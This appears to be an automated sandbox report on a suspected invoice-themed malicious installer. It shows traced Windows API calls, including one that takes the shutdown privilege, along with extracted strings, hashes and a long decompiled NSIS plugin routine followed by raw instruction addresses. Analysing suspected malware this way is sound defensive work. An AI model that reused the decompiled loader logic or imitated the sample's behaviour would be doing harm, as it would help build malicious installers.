Part of subcall function 004038E7: lstrcmpiA.KERNEL32(?,.exe,007A1F00,?,?,?,007A1F00,00000000,C:\Users\user\AppData\Local\Temp,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000), ref: 004039EA
Part of subcall function 004038E7: GetFileAttributesA.KERNEL32(007A1F00), ref: 004039F5
Part of subcall function 004038E7: LoadImageA.USER32 ref: 00403A3E
Part of subcall function 004038E7: RegisterClassA.USER32 ref: 00403A7B

Part of subcall function 0040380D: CloseHandle.KERNEL32(000002BC,00403644,?,?,00000007,00000009,0000000B), ref: 00403818

OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403644
ExitProcess.KERNEL32 ref: 00403665
GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 00403782
OpenProcessToken.ADVAPI32(00000000), ref: 00403789
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037A1
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037C0
ExitWindowsEx.USER32(00000002,80040002), ref: 004037E4
ExitProcess.KERNEL32 ref: 00403807

Part of subcall function 004057F0: MessageBoxIndirectA.USER32 ref: 0040584B

Strings

TEMP, xrefs: 00403575
~nsu, xrefs: 00403670
C:\Users\user\AppData\Local\Temp, xrefs: 00403621
TMP, xrefs: 0040357D
", xrefs: 00403458
C:\Users\user\AppData\Local\Temp, xrefs: 00403515, 00403616, 004036C0, 004036C9
Low, xrefs: 00403563
\Temp, xrefs: 00403547
(y, xrefs: 004036F6
NSIS Error, xrefs: 004033E8
C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, xrefs: 00403722
.tmp, xrefs: 0040368C
Error launching installer, xrefs: 004035FC
"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 004033FD, 00403403, 004035BA
UXTHEME, xrefs: 00403377, 0040337C, 00403382
SeShutdownPrivilege, xrefs: 0040379B
1033, xrefs: 00403591
C:\Users\user\Desktop, xrefs: 00403697, 0040369C, 004036C8
C:\Users\user\AppData\Local\Temp\, xrefs: 00403525, 0040352A, 00403540, 0040354C, 0040355B, 00403568, 00403574, 0040357C, 00403675, 00403686, 00403691, 0040369D, 004036AA, 004036B9, 00403768

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $(y$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3776617018-1676024243
Opcode ID: e0ee7755d63a1f4ec7a66c347b16760821a07832061e30bc4ac118f0a76bf56e
Instruction ID: 97d63beb8df843ca38620017436ed0801945ee3064957e10bbaedf14490df2b6
Opcode Fuzzy Hash: e0ee7755d63a1f4ec7a66c347b16760821a07832061e30bc4ac118f0a76bf56e
Instruction Fuzzy Hash: B6C1F7705047816ED7216F759D89A2F3EACAB86306F05453EF182B61D2CB7C8A15CB2F

Uniqueness

Uniqueness Score: -1.00%

Function 72AB1A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E72AB1A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E72AB1215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E72AB1215();
				_t320 = E72AB123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E72AB12FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E72AB1534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x72ab2259) & 0x000000ff) * 4 +  &M72AB21CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E72AB1224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E72AB1215();
											 &_v12 = E72AB1A36( &_v12);
											__eax = E72AB1429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E72AB1A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E72AB1A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x72ab305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E72AB1A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323); // executed
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E72AB15C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E72AB12FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E72AB15C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323); // executed
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E72AB12FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E72AB12FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E72AB12FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E72AB1224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E72AB12FE(_t90) * 4);
					goto L165;
				}
			}

0x72ab1aa0
0x72ab1aa3
0x72ab1aa6
0x72ab1aa9
0x72ab1aac
0x72ab1aaf
0x72ab1ab2
0x72ab1ab4
0x72ab1ab7
0x72ab1aba
0x72ab1abf
0x72ab1ac2
0x72ab1aca
0x72ab1ad2
0x72ab1ad4
0x72ab1ad7
0x72ab1adf
0x72ab1adf
0x72ab1ae4
0x72ab1ae7
0x00000000
0x00000000
0x72ab1af1
0x72ab1af3
0x72ab1af8
0x72ab1afa
0x72ab1b8b
0x72ab1b8b
0x72ab1b8b
0x72ab1b8f
0x72ab1b92
0x72ab1b94
0x72ab1bb6
0x72ab1bb9
0x72ab1bbb
0x72ab1bc4
0x72ab1bca
0x72ab1bcc
0x72ab1bd2
0x72ab1bd2
0x72ab1bd8
0x72ab1bdb
0x72ab1bdb
0x72ab1bde
0x72ab1bde
0x72ab1be4
0x72ab1be6
0x72ab1be9
0x72ab1bef
0x72ab1bf2
0x72ab1bf2
0x72ab1bf4
0x72ab1bfa
0x72ab1bfd
0x72ab1c21
0x72ab1c24
0x00000000
0x00000000
0x72ab1c27
0x72ab1c29
0x72ab1c37
0x72ab1c3a
0x72ab1c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x72ab1c3e
0x72ab1c3e
0x72ab1c3e
0x72ab1c44
0x72ab1c46
0x00000000
0x00000000
0x72ab1c48
0x72ab1c4a
0x72ab1c4c
0x72ab1c4e
0x00000000
0x00000000
0x00000000
0x72ab1c4e
0x72ab1c50
0x72ab1c52
0x72ab1c54
0x72ab1c54
0x72ab1c5a
0x72ab1c60
0x72ab1c62
0x72ab1c76
0x72ab1c76
0x72ab1c78
0x72ab1c64
0x72ab1c6a
0x72ab1c6d
0x72ab1c6d
0x00000000
0x72ab1bff
0x72ab1bff
0x72ab1bff
0x72ab1c00
0x72ab1c08
0x72ab1c0c
0x72ab1c12
0x72ab1c16
0x00000000
0x72ab1c16
0x72ab1c02
0x72ab1c02
0x72ab1c03
0x00000000
0x00000000
0x72ab1c05
0x72ab1c06
0x00000000
0x00000000
0x00000000
0x72ab1c06
0x72ab1b96
0x72ab1b97
0x72ab1ba0
0x72ab1ba3
0x72ab1bb0
0x72ab1bb0
0x72ab1ba5
0x72ab1ba5
0x72ab1c7e
0x72ab1c81
0x72ab1c84
0x72ab1cf6
0x72ab1cfa
0x72ab1adc
0x00000000
0x72ab1adc
0x00000000
0x72ab1cfa
0x72ab1b94
0x72ab1b00
0x72ab1b03
0x72ab1b66
0x72ab1b69
0x72ab1b7a
0x72ab1b7a
0x72ab1b7d
0x72ab1c89
0x72ab1c8c
0x72ab1c8c
0x72ab1c8e
0x72ab2033
0x72ab2045
0x72ab2045
0x72ab2047
0x00000000
0x00000000
0x72ab2037
0x72ab2038
0x72ab203b
0x72ab203e
0x72ab20ba
0x72ab20c1
0x72ab20c6
0x72ab20c9
0x72ab1cf2
0x72ab1cf2
0x72ab1cf2
0x72ab1cf3
0x00000000
0x72ab1cf3
0x72ab2040
0x72ab2042
0x72ab2042
0x72ab2049
0x72ab204b
0x72ab20ae
0x72ab1ce7
0x72ab1cea
0x72ab1ced
0x72ab1cf0
0x72ab1cf0
0x00000000
0x72ab1cf0
0x72ab204d
0x72ab204f
0x72ab2055
0x72ab2055
0x72ab2057
0x72ab205a
0x72ab206d
0x72ab206d
0x72ab2070
0x72ab2073
0x00000000
0x00000000
0x72ab2075
0x72ab2078
0x00000000
0x00000000
0x72ab207a
0x72ab2081
0x72ab2081
0x72ab2087
0x72ab208a
0x72ab20a6
0x72ab208c
0x72ab2095
0x72ab2098
0x72ab2098
0x00000000
0x72ab208a
0x72ab205c
0x72ab205f
0x72ab2062
0x00000000
0x00000000
0x72ab2064
0x00000000
0x72ab2064
0x72ab2051
0x72ab2053
0x00000000
0x00000000
0x00000000
0x72ab2053
0x72ab1c94
0x72ab1c94
0x72ab1c95
0x72ab1dde
0x72ab1dde
0x72ab1de5
0x72ab1de8
0x00000000
0x00000000
0x72ab1df5
0x00000000
0x72ab1fdb
0x72ab1fde
0x72ab1fe1
0x72ab1fe1
0x72ab1fe2
0x72ab1fe5
0x72ab1fe7
0x72ab1fe9
0x00000000
0x00000000
0x72ab1feb
0x72ab1feb
0x72ab1fee
0x72ab2000
0x72ab2003
0x72ab2006
0x72ab200c
0x00000000
0x72ab200c
0x72ab1ff0
0x72ab1ff0
0x72ab1ff2
0x00000000
0x00000000
0x72ab1ff4
0x72ab1ff6
0x72ab1ff8
0x72ab1ff8
0x72ab1ff8
0x72ab1ff9
0x72ab1ffb
0x72ab1ffd
0x72ab1fe1
0x72ab1fe2
0x72ab1fe5
0x72ab1fe7
0x72ab1fe9
0x00000000
0x00000000
0x00000000
0x72ab1fe9
0x00000000
0x72ab1e3c
0x00000000
0x00000000
0x72ab1e48
0x00000000
0x00000000
0x72ab1e2f
0x72ab1e33
0x72ab1e37
0x00000000
0x00000000
0x72ab1fad
0x72ab1fb1
0x00000000
0x00000000
0x72ab1fb7
0x72ab1fbf
0x72ab1fc6
0x72ab1fce
0x00000000
0x00000000
0x72ab1f15
0x72ab1f15
0x00000000
0x00000000
0x72ab1e51
0x00000000
0x00000000
0x72ab202b
0x00000000
0x00000000
0x72ab1f1d
0x72ab1f1f
0x72ab1f1f
0x00000000
0x00000000
0x72ab201b
0x00000000
0x00000000
0x72ab201f
0x00000000
0x00000000
0x72ab2027
0x00000000
0x00000000
0x72ab1f64
0x72ab1f66
0x72ab1f66
0x00000000
0x00000000
0x72ab1f2f
0x72ab1f31
0x72ab1f31
0x00000000
0x00000000
0x72ab1f41
0x72ab1f43
0x72ab1f43
0x00000000
0x00000000
0x72ab1f72
0x72ab1f74
0x72ab1f74
0x00000000
0x00000000
0x72ab1f4c
0x72ab1f4e
0x72ab1f4e
0x00000000
0x00000000
0x72ab1f53
0x00000000
0x00000000
0x72ab2023
0x72ab202d
0x72ab202d
0x00000000
0x00000000
0x72ab1f7d
0x72ab1f81
0x72ab1f86
0x72ab1f89
0x72ab1f8a
0x72ab1f8d
0x72ab1f93
0x72ab1f93
0x00000000
0x00000000
0x72ab2013
0x00000000
0x00000000
0x72ab1f57
0x72ab1f57
0x00000000
0x00000000
0x72ab1e58
0x72ab1e58
0x00000000
0x00000000
0x72ab1f6b
0x72ab1f6d
0x72ab1f6d
0x00000000
0x00000000
0x72ab1dfc
0x72ab1e02
0x72ab1e05
0x72ab1e07
0x72ab1e07
0x72ab1e0a
0x72ab1e0e
0x72ab1e1b
0x72ab1e1d
0x72ab1e23
0x72ab1e23
0x72ab1e23
0x00000000
0x00000000
0x72ab1f20
0x72ab1f20
0x72ab1f22
0x72ab1f29
0x00000000
0x00000000
0x72ab1f67
0x72ab1f67
0x00000000
0x00000000
0x72ab1f32
0x72ab1f32
0x72ab1f34
0x72ab1f3b
0x00000000
